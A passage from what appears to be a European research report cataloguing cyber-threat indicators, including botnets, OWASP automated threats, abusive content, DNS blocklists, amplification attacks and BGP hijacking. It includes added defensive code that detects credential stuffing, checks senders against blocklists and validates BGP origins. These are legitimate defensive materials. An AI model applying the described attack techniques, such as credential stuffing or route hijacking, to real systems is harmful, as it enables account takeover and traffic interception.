Nomenclature: Threats automated by software causing a divergence from accepted behaviour, producing one or more undesirable effects on a web application, but excluding tool-based exploitation of single-issue vulnerabilities87.

Examples: Mirai botnet and newer variants: Chalubo bot, Torii, DemonBot, Akiru, Katrina_V1, Sora, Saikin, Owari, JoshoV3, Tokyo. Reaper: malware that turns networked devices into attack tools as part of a large botnet using command and control. VPNFilter botnet: targets networking devices such as Linksys, MikroTik, Netgear, and TP-Link networking equipment in the small and home office (SOHO) space.

Usage: Exploitation of unmitigated vulnerabilities. Web applications are subjected to unwanted automated usage, day in, day out. Often these events relate to misuse of inherent valid functionality and are commonly mistakenly reported as application denial-of-service (DoS) like HTTP flooding.

Metrics: Mirai enslaved 600,000 vulnerable IoT devices at its peak88. The cost was estimated to be $13.50 per infected device89. New DDoS launch platform, 0x-booter. VPNFilter has impacted at least 500,000 networking devices during the last few years90.

85 INSCRYPT 2014 The 10th International Conference on Information Security and Cryptology, December 2014, Beijing, China - http://www.inscrypt.cn/2014/
86 Dridex Banking Trojan Will Soon Target Cryptocurrency Wallets - 2016 - http://news.softpedia.com/news/dridex-banking-trojan-will-soon-target-crypto-currency-wallets-508041.shtml

7.5 OAT ontology

Nomenclature: List of threat events, for example OWASP91.

Examples: OAT-001 Carding, OAT-002 Token Cracking, OAT-003 Ad Fraud, OAT-004 Fingerprinting, OAT-005 Scalping, OAT-006 Expediting, OAT-007 Credential Cracking, OAT-008 Credential Stuffing, OAT-009 CAPTCHA Defeat, OAT-010 Card Cracking, OAT-011 Scraping, OAT-012 Cashing Out, OAT-013 Sniping, OAT-014 Vulnerability Scanning, OAT-015 Denial of Service, OAT-016 Skewing, OAT-017 Spamming, OAT-018 Footprinting, OAT-019 Account Creation, OAT-020 Account Aggregation, OAT-021 Denial of Inventory92.

Usage: To provide actionable information and resources to help defend against automated threats to web applications.

Metrics: 75% of application denial-of-service (DDoS) like HTTP flooding is in fact mistakenly reported. The DDoS effect is a side-effect instead of the primary intent, which is an automated threat to web applications. In an exercise of attack traffic analysis on darknets operated by SISSDEN, what was conventionally analysed as DDoS was in fact, and could be classified as, 'OAT-014 Vulnerability Scanning', emanating from a known source of mass vulnerability scanning.

87 https://www.owasp.org/index.php/OWASP_Automated_Threats_to_Web_Applications
88 https://elie.net/blog/security/inside-mirai-the-infamous-iot-botnet-a-retrospective-analysis/
89 https://www.theregister.co.uk/2018/05/09/berkeley_boffins_infect_things_with_mirai_in_a_good_cause/
90 https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/vpnfilter-botnet-targets-networking-devices/
91 OWASP Automated Threats to Web Applications - Threat Event Identification Chart v1.0
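The Metrics column makes the point that the OAT label is decided by intent, not by the traffic volume that gets noticed first. The same applies to login abuse: OAT-008 Credential Stuffing replays leaked username/password pairs, so one source touches many accounts about once each (and some succeed), whereas OAT-007 Credential Cracking hammers one account with many guesses. The following is an added example, not from OWASP or the report, that separates the two from a constructed application-level login record (timestamp, source IP, account, outcome). Keying on source IP alone is a simplification; both OATs are normally spread across proxies, so a deployed version would also aggregate on user-agent, ASN and session fingerprints.

```python
"""Telling OAT-008 Credential Stuffing from OAT-007 Credential Cracking in a
login log. Added example with a constructed log; see lead-in for assumptions."""
from collections import defaultdict

STUFFING = "OAT-008 Credential Stuffing"
CRACKING = "OAT-007 Credential Cracking"


def classify_login_sources(lines, min_attempts=10, stuffing_ratio=0.8, fail_ratio=0.9) -> dict:
    """Per source IP: stuffing = many distinct accounts each tried about once;
    cracking = one account, nearly all guesses failing; otherwise 'normal'."""
    per_ip = defaultdict(lambda: {"attempts": 0, "accounts": set(), "fails": 0})
    for line in lines:
        fields = line.split()
        if len(fields) != 4:
            continue
        _ts, ip, account, outcome = fields
        s = per_ip[ip]
        s["attempts"] += 1
        s["accounts"].add(account)
        s["fails"] += outcome == "FAIL"
    verdict = {}
    for ip, s in per_ip.items():
        n = s["attempts"]
        if n < min_attempts:
            verdict[ip] = "normal"
        elif len(s["accounts"]) / n >= stuffing_ratio:
            verdict[ip] = STUFFING
        elif len(s["accounts"]) == 1 and s["fails"] / n >= fail_ratio:
            verdict[ip] = CRACKING
        else:
            verdict[ip] = "normal"
    return verdict


# Constructed log: one stuffing source (12 accounts, one succeeds, as replayed leaked
# credentials do), one cracking source (15 guesses at 'admin'), and one user who
# mistyped a password twice before getting in.
SAMPLE_LOG = (
    [f"2019-01-12T10:00:{i:02d}Z 203.0.113.9 user{i:02d} {'OK' if i == 7 else 'FAIL'}"
     for i in range(12)]
    + [f"2019-01-12T10:01:{i:02d}Z 198.51.100.4 admin FAIL" for i in range(15)]
    + ["2019-01-12T10:02:00Z 192.0.2.7 alice FAIL",
       "2019-01-12T10:02:05Z 192.0.2.7 alice FAIL",
       "2019-01-12T10:02:09Z 192.0.2.7 alice OK"]
)

if __name__ == "__main__":
    for ip, verdict in classify_login_sources(SAMPLE_LOG).items():
        print(ip, verdict)
```

The two verdicts call for different controls: per-account lockout stops cracking but is useless against stuffing (each account sees one attempt), which needs breached-credential checks and rate limits per source instead.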

7.6 Bad bots

Nomenclature Examples Usage Metrics

Nomenclature: Bad Bots generally provide no value to the website and include scrapers, spambots, and email harvesters. Bad bots consume bandwidth, slow down servers, steal content and crawl for vulnerabilities.

Examples: Top 7 Bots Caught by Distil93: DotBot, GiftGhostBot, Grapeshot, Seznam Bot, MetaURI, PaperLiBot, Genieo.

Usage: DotBot - A web scraper developed by Dotmic that scrapes product listings and prices from e-commerce websites. GiftGhostBot - A bot designed by hackers which is being used to defraud many gift card owners. Grapeshot - A bot that uses probabilistic algorithms to assess the relative significance of keywords in pages and what users read.

Metrics: 8,448,885,728 Bad Bots detected during a 30 day snapshot94.

92 https://www.owasp.org/index.php/OWASP_Automated_Threats_to_Web_Applications
93 https://www.distilnetworks.com/glossary/term/block-bad-bots/
94 https://www.distilnetworks.com/bot-directory/

8 Indicators - Abusive content

Abusive content includes the following definitions: practising abuse via websites and social media; ill-treatment of others by coarse, insulting words or harmful acts; injurious, improper, hurtful, offensive, reproachful. The indicators included here align with the taxonomy (as shown in Section 2 above) from ENISA/EC3 involving CSIRTs, LEAs, ENISA, and EC3, and shown within MISP95:

• Spam (deceptive communications)
• Harmful speech
• Child/sexual/violence/... (child sexual abuse)

Also included are related indicators:

• Cyberbullying
• Fake news (deceptive content)

Nomenclature Examples Usage Metrics

Nomenclature: Abusive content via emails, websites and social media, involving ill-treatment of others by offensive words, threats of violence, child sexual abuse, harmful acts, cyber stalking, racism, discrimination, and threats against one or more individuals.

Examples: Government or law enforcement officials sometimes make requests for data about people who use Facebook, Instagram, Messenger, Oculus and WhatsApp, as part of official investigations. The vast majority of these requests relate to criminal cases. In many of these cases, these government requests seek basic subscriber information, such as name, registration date and length of service. Other requests may also seek IP address logs or account content96. This section of Abusive content is typified by the nature of remediation: it is generally only accepted and acted upon by government or law enforcement requests or actions. It should be noted that the large proportion (83% worldwide) of government-required social media accounts preserved (limited access awaiting formal governmental paperwork) are from US governmental sources e.g. FISA/FBI.

Usage: US - Foreign Intelligence Surveillance Act - FISA governs how the U.S. collects foreign intelligence for national security. The Act created the Foreign Intelligence Surveillance Court (FISC). These courts have the power to require companies or other private organizations to disclose information in foreign intelligence investigations. US National Security Letters - An administrative subpoena issued by the FBI in an ongoing national security investigation that compels a provider to produce a customer's name, address, and length of service.

Metrics: Sample results from social media sources i.e. Facebook, Instagram, Messenger, Oculus and WhatsApp (as shown in Figures 8-1 to 8-3 below, actions taken upon government requests); samples are from Jan to Jun 2018.

95 https://www.misp-project.org/taxonomies.html
96 https://transparency.facebook.com/government-data-requests/jan-jun-2018

Figure 8.1: Government required content restrictions - Top 10 countries

Figure 8.2: Government required social media accounts (access locked and awaiting formal governmental paperwork to follow the initial request) - Facebook, Instagram, Messenger, Oculus and WhatsApp - Jan to Jun 2018.

Figure 8.3: Top 10 countries - Facebook, Instagram, Messenger, Oculus and WhatsApp - Jan to Jun 2018 (government requests for access to social media accounts)

8.1 Spam (deceptive communications)

Nomenclature Examples Usage Metrics

Nomenclature: Spam refers to the use of electronic messaging systems to send out unrequested or unwanted messages in bulk. Spam is no longer singularly associated with email; it also includes link spam, spamdexing, tweet spam and messaging spam (text/SMS).

Examples: This includes: instant message spam, search engine spam, blog spam, Usenet newsgroup spam, wiki spam, classified ads spam, Internet forum spam, social media spam, junk fax spam. Spam can be used to spread computer viruses, trojan horses or other malicious software.

Usage: Spamming remains economically viable because advertisers have no operating costs beyond the management of their mailing lists, servers, infrastructures, IP ranges, and domain names, and it is difficult to hold senders accountable for their mass spam mailings.

Metrics: Spamhaus anti-spam blocklist, the SBL, is used by more than 1 billion Internet users and protects over 3 billion user mailboxes, based on the internationally accepted definition of Spam as "Unsolicited Bulk Email"97. Average Daily Spam Volume is 383.29 billion, 85.34% of all global Internet traffic98.

97 Spamhaus - 2018 - https://www.spamhaus.org/consumer/definition/
98 Email & Spam Data - CISCO - Mar 2018 - https://www.talosintelligence.com/reputation_center/email_rep

8.2 Harmful speech

Nomenclature Examples Usage Metrics

Nomenclature: Discreditation or discrimination of somebody (e.g. cyber stalking, racism and threats against one or more individuals).

Examples: There are many forms of speech that can cause harm that are not typically included in discussions of hate speech, for example incursions on privacy, violent extremism online99.

Usage: The EU’s “Framework Decision on combating certain forms and expressions of racism and xenophobia by means of criminal law”100. Facebook defines and removes hate speech: a direct attack on people based on what is called protected characteristics – race, ethnicity, national origin, religious affiliation, sexual orientation, caste, sex, gender, gender identity and serious disease or disability. They also provide some protections for immigration status. "We define 'attack' as violent or dehumanising speech, statements of inferiority, or calls for exclusion or segregation."101

Metrics: Facebook revealed that it deleted 865.8 million posts in the first quarter of 2018, the vast majority of which were spam, with a minority of posts related to nudity, graphic violence, hate speech and terrorism. Facebook also said it removed 583 million fake accounts in the same period. Of the accounts that remained, the company said 3 percent to 4 percent were fake.

8.3 Child/Sexual/Violence/... (child sexual abuse)

Nomenclature Examples Usage Metrics

Nomenclature: Child sexual abuse is a form of child abuse in which an adult or older adolescent uses a child for sexual stimulation. Forms of child sexual abuse include engaging in sexual activities with a child (whether by asking or pressuring, or by other means), indecent exposure (of the genitals, female nipples, etc.), child grooming, or using a child to produce pornography.

Examples: The Council and the European Parliament adopted on 13 December 2011 a Directive on combating the sexual abuse and sexual exploitation of children and child pornography, stepping up the fight against child sexual abuse. The Directive is a comprehensive legal framework which covers investigation and prosecution of crimes, assistance to and protection of victims, and prevention. Member States in turn have to implement its provisions in their national laws. On 16 December 2016, the Commission adopted two reports on the measures taken by Member States to combat the sexual abuse and sexual exploitation of children.102

Usage: In the cyber security field this topic is of a particular difficulty, due to the nature of the subject and legal restrictions in most jurisdictions on researchers unlawfully accessing the content. Access to the content is only permitted by trained individuals within, and authorised by, law enforcement.

Metrics: From IWF (Internet Watch Foundation)103 in 2017: 132,636 reports were processed (26% increase on 2016). 78,589 URLs were confirmed as containing child sexual abuse imagery, having links to the imagery, or advertising it. 1,729 newsgroup/social media instances were confirmed as containing child sexual abuse imagery. 86% increase in the use of disguised websites (hidden networks). These are websites where the child sexual abuse imagery will only be revealed to someone who has followed a pre-set digital pathway; to anyone else, they will be shown legal content. An increasing amount of child sexual abuse imagery is being hosted in Europe, rather than North America; the trend continues from 2016 and the gap widened.

99 Defining Hate Speech - Boston University School of Law; Berkman Klein Center for Internet & Society - 2017 - https://papers.ssrn.com/sol3/papers.cfm?abstract_id=2882244
100 “EU Framework Decision on Racism and Xenophobia” - Framework Decision 2008/913/JHA (Nov. 28, 2008), available at http://eur-lex.europa.eu/legal-content/EN/TXT/?uri=uriserv%3Al33178
101 Facebook policy on Hate Speech - https://www.facebook.com/communitystandards/introduction
103 IWF - https://www.iwf.org.uk/

8.4 Cyberbullying

Nomenclature Examples Usage Metrics

Nomenclature: Cyberbullying is a practice where an individual or group uses the Internet to ridicule, harass or harm another person. The social and emotional harm inflicted by cyberbullies grows out of, or leads to, physical bullying in the offline world.

Examples: Cyberbullying is a prosecutable offense in some jurisdictions, but a globally uniform legal approach has not yet been established. COFACE Families Europe coordinated the European Awareness Raising Campaign on Cyberbullying #DeleteCyberbullying from February 2013 to July 2014. The project was financed under the Daphne III programme of the European Commission104.

Usage:
● Sending mean messages or threats to a person’s email account or cell phone
● Spreading rumours online or through texts
● Posting hurtful or threatening messages on social networking sites or web pages
● Stealing a person’s account information to break into their account and send damaging messages
● Pretending to be someone else online to hurt another person
● Taking unflattering pictures of a person and spreading them through cell phones or the Internet
● Sexting, or circulating sexually suggestive pictures or messages about a person

Metrics: From a nationally representative sample (20,000) of 12-17-year-old middle and high school students in the US105:
● 33.8% cyberbullied in their lifetime
Within 30 days before interview / survey:
● 16.9% cyberbullied
● 22.5% with mean or hurtful comments online
● 12.2% physically threatened online
● 12.7% sexting
EU Kids Online 2014 report found that 6% of 9 to 16-year-olds report having been bullied online across Europe106.

102 Child sexual abuse - https://ec.europa.eu/home-affairs/what-we-do/policies/organized-crime-and-human-trafficking/child-sexual-abuse_en
105 Cyberbullying Research Center - 2016 - https://cyberbullying.org/2016-cyberbullying-data

8.5 Fake news (deceptive content)

Nomenclature Examples Usage Metrics

Nomenclature: Fake news, deceptive content, or what are often referred to as fake news websites, are Internet websites that deliberately publish hoaxes, propaganda, and disinformation purporting to be real news. This is often done using social media to drive web traffic and amplify their effect. Fake news websites deliberately seek to be perceived as legitimate and taken at face value, often for financial or political gain.

Examples: Misinformation is false or inaccurate information that is mistakenly or inadvertently created or spread; the intent is not to deceive. Disinformation is false information that is deliberately created and spread "in order to influence public opinion or obscure the truth". Disinformation cyber-warfare - nation-state attacks using fake news, aiming for intangibles, with economic, political, and social impact.

Usage: As shown in the US federal indictment – to defraud the United States by impairing, obstructing, and defeating the lawful functions of the government through fraud and deceit for the purpose of interfering with the U.S. political and electoral processes, including the presidential election of 2016.107 Fake news and deceptive content are now seen as active in many countries’ election processes.108 Officials from 11 countries met in Helsinki in November 2016, in order to plan the formation of a centre to combat disinformation cyber-warfare including the spread of fake news on social media111.

Metrics: Over 60 percent of respondents in a recent survey believed that the ‘fake news’ headline, claiming the Pope released a statement in support of the Republican candidate (Trump), was somewhat or very accurate109. Facebook and Google now would ban ads from sites with deceptive content, including fake news, and review publishers for compliance.110

104 COFACE Families Europe coordinated the European Awareness Raising Campaign on Cyberbullying - 09 2017 - https://deletecyberbullying.wordpress.com/
106 EU Kids Online 2011 report - 2011 - http://www.lse.ac.uk/media@lse/research/EUKidsOnline/EU%20Kids%20II%20(2009-11)/EUKidsOnlineIIReports/Final%20report.pdf

107 https://www.justice.gov/file/1035477/download
108 https://en.wikipedia.org/wiki/Fake_news#Fake_news_by_country
109 https://www.statista.com/topics/3251/fake-news/
110 https://www.nytimes.com/2016/11/15/technology/google-will-ban-websites-that-host-fake-news-from-using-its-ad-service.html
111 https://yle.fi/uutiset/osasto/news/helsinki_to_host_hub_aimed_at_curbing_cyber_warfare_threats/9307244

9 Blacklists, Blocklists and Whitelists - Open Source Methodologies

Lists of known and regularly referenced blacklists / blocklists / Domain Name System-based Blackhole Lists (DNSBL) or Real-time Blackhole Lists (RBL) are shown in Annex A and B. It should be noted that individual nation states operate nationwide blocklists. As of September 2016, more than 6,000,000 websites were blocked in mainland China under the country's Internet censorship policy112.

Nomenclature Examples Usage Metrics

Nomenclature: A blacklist is an access control system that denies entry to a specific list (or a defined range) of users, programs, or network addresses. The Domain Block List (DBL) is a real time database of spam domains including spam payload URLs, spam sources and senders, known spammers and spam gangs, as well as phish, virus and malware-related sites. Domain Name System Blacklists, also known as DNSBLs or DNS Blacklists, are spam blocking lists that allow a website administrator to block messages from specific systems that have a history of sending spam or malware. A whitelist is a generic name for a list of email addresses or IP addresses that are considered to be spam or malware free. Whitelists are used frequently with e-mail applications to allow users to compile lists of senders they wish to receive emails from. This list overrides any blacklists and spam filters and allows the emails to be delivered to the user’s inbox instead of being filtered out at the firewall level.

Examples: Blacklists, Blocklists and Whitelists are used on every Internet server ‘firewall’ and spam filter. Many Internet ISPs and webmasters use custom Blacklists, Blocklists and Whitelists based upon client behaviour, adapted from available blacklists. PC and network owners have the ability to use a ‘Hosts File’, which is a self-determined blacklist. It is an operating system file that maps hostnames to IP addresses. It is a plain text file, originally a file named HOSTS.TXT. Also see 4.7 Spam.

Usage: There are thousands of blacklists and blocklists (see Annex A) in operation around the world. Also, there are many privately managed blacklists. The two best known are113:
SpamCop: This blacklist adds IP addresses to its list based on the ratio of spam complaints to volume of emails sent. An IP address can be added and removed several times even during a 24-hour period depending on the frequency of sampling by SpamCop.
SpamHaus: This is a popular and free blacklist used by ISPs and corporate networks worldwide. SpamHaus also runs ROKSO (Register of Known Spam Operations)114 that lists spammers who have been terminated three or more times by ISPs.

Metrics: 80% of spam received by Internet users in North America and Europe can be traced via aliases, addresses, redirects, locations of servers, domains and DNS setups, to around 100 known spam operations listed in the ROKSO database. This would be 72% of all global Internet traffic. Also see 4.7 Spam.

112 Websites blocked in mainland China - https://en.wikipedia.org/wiki/Websites_blocked_in_mainland_China#cite_note-GreatFire.org-1
113 How and why ISPs block emails - https://help.campaignmonitor.com/how-why-isps-block-emails
114 The Register of Known Spam Operations database is a depository of information and evidence on known persistent spam operations, assembled to assist service providers with customer vetting and the Infosec industry with Actor Attribution. - 04 2018 - https://www.spamhaus.org/rokso/
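The DNSBL mechanism described above (reversed-address query, loopback return codes, whitelist overriding every blocklist) as an added example; this is not code from the SAINT report. The resolver is injected as a function, so the answers below are constructed and the block runs offline; the Spamhaus return codes are those the zone documents and should be re-checked before use.

```python
"""DNSBL query construction and verdict logic with whitelist override.

Added example, not code from the SAINT report. The resolver is injected as
a function so the block runs offline with constructed answers; a live
deployment would pass a function that performs a real A-record lookup.
"""
import ipaddress
from typing import Callable, Dict, Iterable, List, Tuple

# Resolver contract: query name -> list of A-record strings ([] means NXDOMAIN).
Resolver = Callable[[str], List[str]]

# Return codes published by Spamhaus for its ZEN zone (SBL/XBL/PBL combined).
# Verify against the zone's current documentation before relying on them.
SPAMHAUS_ZEN_CODES: Dict[str, str] = {
    "127.0.0.2": "SBL (verified spam source)",
    "127.0.0.3": "SBL CSS (snowshoe / low-reputation sender)",
    "127.0.0.4": "XBL (exploited or malware-infected host)",
    "127.0.0.5": "XBL (exploited or malware-infected host)",
    "127.0.0.6": "XBL (exploited or malware-infected host)",
    "127.0.0.7": "XBL (exploited or malware-infected host)",
    "127.0.0.10": "PBL (end-user address space, ISP maintained)",
    "127.0.0.11": "PBL (end-user address space, Spamhaus maintained)",
}


def dnsbl_query_name(ip: str, zone: str) -> str:
    """Build the reversed-address query name, e.g. 192.0.2.10 -> 10.2.0.192.<zone>.

    IPv6 addresses are expanded to 32 nibbles and reversed nibble by nibble,
    the convention most DNSBLs use for IPv6 listings.
    """
    addr = ipaddress.ip_address(ip)
    if addr.version == 4:
        labels = str(addr).split(".")[::-1]
    else:
        labels = list(addr.exploded.replace(":", ""))[::-1]
    return ".".join(labels) + "." + zone.strip(".")


def interpret_answer(zone: str, answer: str) -> Tuple[str, str]:
    """Classify one A-record answer as a listing or a lookup error.

    127.255.255.0/24 is the range Spamhaus uses to signal rejected queries
    (open resolver, query limit exceeded); anything outside 127.0.0.0/8 is
    not a DNSBL answer at all (typically a resolver that rewrites NXDOMAIN).
    """
    a = ipaddress.ip_address(answer)
    if a in ipaddress.ip_network("127.255.255.0/24"):
        return "error", f"{zone} rejected the query (code {answer})"
    if a not in ipaddress.ip_network("127.0.0.0/8"):
        return "error", f"{zone} returned non-loopback answer {answer}; resolver may rewrite NXDOMAIN"
    if zone.endswith("spamhaus.org"):
        return "listed", SPAMHAUS_ZEN_CODES.get(answer, f"listed with code {answer}")
    return "listed", f"listed with code {answer}"


def check_sender(ip: str, whitelist: Iterable[str], zones: Iterable[str],
                 resolve: Resolver) -> dict:
    """Whitelist first (it overrides every blocklist), then consult each zone.

    Lookup errors are recorded but never block on their own: a zone that is
    unreachable or rate-limiting must not turn into a mail outage.
    """
    addr = ipaddress.ip_address(ip)
    if any(addr in ipaddress.ip_network(w, strict=False) for w in whitelist):
        return {"ip": ip, "verdict": "allow", "reason": "whitelisted",
                "listings": [], "errors": []}
    listings: List[Tuple[str, str, str]] = []
    errors: List[Tuple[str, str, str]] = []
    for zone in zones:
        for answer in resolve(dnsbl_query_name(ip, zone)):
            status, detail = interpret_answer(zone, answer)
            (listings if status == "listed" else errors).append((zone, answer, detail))
    if listings:
        verdict, reason = "block", "listed on " + ", ".join(z for z, _, _ in listings)
    elif errors:
        verdict, reason = "allow", "no listing confirmed; lookup errors, failing open"
    else:
        verdict, reason = "allow", "not listed"
    return {"ip": ip, "verdict": verdict, "reason": reason,
            "listings": listings, "errors": errors}


# Constructed answers standing in for live DNS (documentation-range addresses).
CONSTRUCTED_ANSWERS: Dict[str, List[str]] = {
    "10.2.0.192.zen.spamhaus.org": ["127.0.0.2"],         # listed, but whitelisted below
    "7.100.51.198.zen.spamhaus.org": ["127.0.0.4"],       # XBL listing
    "5.113.0.203.zen.spamhaus.org": ["127.255.255.254"],  # query rejected by the zone
    "5.113.0.203.bl.spamcop.net": ["127.0.0.2"],          # SpamCop listing
}


def constructed_resolver(name: str) -> List[str]:
    return CONSTRUCTED_ANSWERS.get(name, [])


ZONES = ["zen.spamhaus.org", "bl.spamcop.net"]
WHITELIST = ["192.0.2.0/24"]   # trusted partner range, constructed
SAMPLE_SENDERS = ("192.0.2.10", "198.51.100.7", "203.0.113.5", "203.0.113.9")


def demo() -> Dict[str, str]:
    """Run the constructed senders through the policy and return ip -> verdict."""
    return {ip: check_sender(ip, WHITELIST, ZONES, constructed_resolver)["verdict"]
            for ip in SAMPLE_SENDERS}


if __name__ == "__main__":
    for sender in SAMPLE_SENDERS:
        print(check_sender(sender, WHITELIST, ZONES, constructed_resolver))
```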


10 Indicators - Insecurity

There are many elements of insecurity within ICT (Information and Communications Technology). According to SAINT research the five indicators described here are the most relevant within current cyber security practices/research.

10.1 DNS - Misconfigured open resolvers (DDoS & DrDoS)

Nomenclature Examples Usage Metrics

Nomenclature: DNS amplification is a Distributed Denial of Service (DDoS) attack in which the attacker exploits vulnerabilities in domain name system (DNS) servers to turn initially small queries into much larger payloads, which are used to bring down the victim’s servers. DNS amplification is a type of reflection attack which manipulates publicly-accessible domain name systems, making them flood a target with large quantities of UDP packets. Using various amplification techniques, perpetrators can “inflate” the size of these UDP packets, making the attack so potent as to bring down even the most robust Internet infrastructure.

Examples: See 4.4 Denial Of Service (DoS, DDoS, DrDoS).

Usage: From late 2018 Memcached amplification attacks have emerged. Malicious actors have started abusing the Memcached protocol to launch distributed (DDoS / DrDoS) attacks. Memcached is a free and open source distributed memory caching system designed to work with a large number of open connections. Clients can communicate with Memcached servers via TCP or UDP on port 11211115.

Metrics: See 4.4 Denial Of Service (DoS, DDoS, DrDoS). Security researchers at Cloudflare, Arbor Networks, and Chinese security firm Qihoo 360 noticed that hackers are now abusing "Memcached" to amplify their DDoS attacks by an unprecedented factor of 51,200. Memcached reflection attacks recorded, worldwide, at an average of 2,700/day over a 30 day period Jan/Feb 2019.

115 Memcached Abused for DDoS Amplification Attacks - 02 2018 - https://www.securityweek.com/memcached-abused-ddos-amplification-attacks

Figure 10.1: Location of Memcached protocol servers (Arbor Networks)

Figure 10.2: Memcached amplification attacks recorded 30 days (DDoSMon)116

10.2 BGP – Hijacking, outages, leaks

Nomenclature Examples Usage Metrics

Nomenclature: BGP (Border Gateway Protocol) - BGP hijacking is when attackers maliciously reroute Internet traffic. Attackers accomplish this by falsely announcing ownership of groups of IP addresses, called IP prefixes, that they do not actually own, control, or route to.

Examples: In April 2018 a BGP Hijack of Amazon DNS was enacted to steal crypto currency. eNet/XLHost (AS10297), a US based host, suffered a breach enabling attackers to impersonate Amazon’s authoritative DNS service. These attackers used AS10297 to announce five routes used by Amazon’s DNS. MyEtherWallet eventually issued an announcement acknowledging that many of the users of their cryptocurrency service had been redirected to a fraudulent site. Most of the funds ended up within the anonymous attacker’s cryptocurrency wallet, showing cryptocurrency transactions worth $17.3M USD had been stolen117.

Usage: As a result of BGP hijacking, Internet traffic can go the wrong way, be monitored or intercepted, be 'black holed,' or be directed to fake websites as part of a man-in-the-middle attack. In addition, spammers can use BGP hijacking, or the network of an AS that practices BGP hijacking, in order to spoof legitimate IPs for spamming and data theft purposes.

Metrics: In 2017 there were:
• 13,935 total incidents (either outages or route hijacks)
• Over 10% of all Autonomous Systems on the Internet were affected
• 3,106 Autonomous Systems were a victim of at least one routing incident
• 1,546 networks caused at least one incident118

116 Memcached amplification attacks recorded 30 days - https://ddosmon.net/memcached_amplification_attack
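Origin validation is the routing-side check that catches the pattern in the Amazon DNS incident above: an AS announcing prefixes it is not authorised to originate. The following is an added example, not code from the SAINT report or any RPKI implementation; the authorisation records follow the shape of RPKI ROAs (prefix, origin AS, maxLength) and the outcome follows RFC 6811. The prefixes and AS64500-64501 are documentation ranges constructed for the demo; AS10297 is the announcing AS the report names.

```python
"""Origin validation for BGP announcements (RFC 6811 style).

Added example, not code from the SAINT report. Prefixes 192.0.2.0/23 and
198.51.100.0/24 and AS64500/AS64501 are documentation ranges constructed for
the demo; AS10297 is the announcing AS the report names for the 2018 event.
"""
import ipaddress
from dataclasses import dataclass
from typing import List, Sequence, Tuple


@dataclass(frozen=True)
class Roa:
    prefix: str        # authorised prefix, e.g. "192.0.2.0/23"
    origin_as: int     # AS allowed to originate it
    max_length: int    # longest more-specific the origin may announce


@dataclass(frozen=True)
class Announcement:
    prefix: str
    origin_as: int     # last AS in the AS_PATH
    observed_at: str   # collector or peer label (constructed)


def validate(ann: Announcement, roas: Sequence[Roa]) -> Tuple[str, str]:
    """Return (state, explanation) for one announcement.

    not-found: no ROA covers the prefix (nothing to compare against)
    valid:     a covering ROA names this origin and permits this length
    invalid:   covering ROAs exist but none matches; with a more-specific
               prefix from a foreign origin this is the hijack signature
    """
    net = ipaddress.ip_network(ann.prefix)
    covering = [r for r in roas
                if ipaddress.ip_network(r.prefix).version == net.version
                and net.subnet_of(ipaddress.ip_network(r.prefix))]
    if not covering:
        return "not-found", "no ROA covers this prefix"
    matching = [r for r in covering
                if r.origin_as == ann.origin_as and net.prefixlen <= r.max_length]
    if matching:
        return "valid", f"AS{ann.origin_as} authorised up to /{matching[0].max_length}"
    if any(r.origin_as == ann.origin_as for r in covering):
        return "invalid", (f"AS{ann.origin_as} may originate the covering prefix "
                           f"but /{net.prefixlen} exceeds its maxLength")
    allowed = sorted({r.origin_as for r in covering})
    return "invalid", (f"AS{ann.origin_as} is not an authorised origin; "
                       f"covering ROAs name AS{', AS'.join(map(str, allowed))}")


def detect_hijacks(announcements: Sequence[Announcement],
                   roas: Sequence[Roa]) -> List[dict]:
    """Filter a feed of announcements down to the invalid ones, for alerting."""
    alerts = []
    for ann in announcements:
        state, why = validate(ann, roas)
        if state == "invalid":
            alerts.append({"prefix": ann.prefix, "origin_as": ann.origin_as,
                           "observed_at": ann.observed_at, "reason": why})
    return alerts


# Constructed authorisation: the legitimate operator AS64500 holds a /23 and
# may announce it as two /24s at most.
ROAS = [Roa("192.0.2.0/23", 64500, 24)]

# Constructed feed: the legitimate /24, the same /24 from a foreign origin
# (the more-specific hijack pattern), an over-long announcement by the owner,
# and a prefix with no ROA at all.
FEED = [
    Announcement("192.0.2.0/24", 64500, "collector-A"),
    Announcement("192.0.2.0/24", 10297, "collector-B"),
    Announcement("192.0.2.0/25", 64500, "collector-A"),
    Announcement("198.51.100.0/24", 64501, "collector-A"),
]

if __name__ == "__main__":
    for entry in FEED:
        print(entry.prefix, f"AS{entry.origin_as}", *validate(entry, ROAS))
```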

10.3 Insider threat (malicious and accidental)

Nomenclature Examples Usage Metrics

Nomenclature: An insider threat is generally defined as a current or former employee, contractor, or other business partner who has or had authorized access to an organization's network, system, or data and intentionally misused that access to negatively affect the confidentiality, integrity, or availability of the organization's information or information systems.

Examples: Insider threat detection has become an important factor: the US National Industrial Security Program Operating Manual (NISPOM), which provides baseline standards for the protection of classified information, signed by President Obama in September 2011, Executive Order 13587, requires federal agencies that operate or access classified computer networks to implement insider threat detection and prevention programs.119

Usage: Insider threats include: sabotage, theft, espionage, fraud, theft of materials, and mishandling physical devices. Insiders do not always act alone and may not be aware they are aiding a threat actor (i.e. the accidental insider threat). Competitive advantage is often the goal through abusing access rights.

Metrics: The top three risk factors enabling the insider threat vulnerability are:
● excessive access privileges (37%)
● endpoint access (36%),
● information technology complexity (35%).
Within this insider threat study120:
● 53% confirmed that an insider attack had happened at their organization in the last year.

117 https://blogs.oracle.com/internetintelligence/bgp-hijack-of-amazon-dns-to-steal-crypto-currency
118 https://bgpstream.com/
120 Insider Threat Report - 2018 - http://crowdresearchpartners.com/wp-content/uploads/2017/07/Insider-Threat-Report-2018.pdf

10.4 Physical manipulation / damage / theft / loss

Nomenclature Examples Usage Metrics

Nomenclature: Intentional actions (non-fulfilment or defective fulfilment of personal duties) aimed to cause disruption or damage of IT Assets. Acts of physical damage to IT Assets. Taking of another person's computing hardware property, which often contains sensitive data. This can be in the form of mobile devices, for example laptops, smartphones, tablets. Threats of bombing or other actions against IT infrastructures now count as a terrorist attack, and if from a nation state, this is an act of war.

Examples: 2008, hackers accessed a Turkish pipeline through surveillance camera software and caused an explosion by super pressurizing the oil in the pipeline after shutting down its alarms.

2009, a former employee was responsible for a computer intrusion of a large power company in Texas US, that crippled the company’s energy forecast system and incurred more than $26,000 in damages.

In 2014, the German Federal Office of Information Security announced that hackers had gained access to a German steel factory’s production networks and caused system components to fail by tampering with the controls of its blast furnace.

2015, hackers obtained control of a power grid in western Ukraine, opening up circuit breakers and knocking out power stations.

2017, hackers infiltrated an Austrian hotel’s electronic key system, locking guests out of their rooms and forcing the hotel to give in to the hackers’ ransom demand.

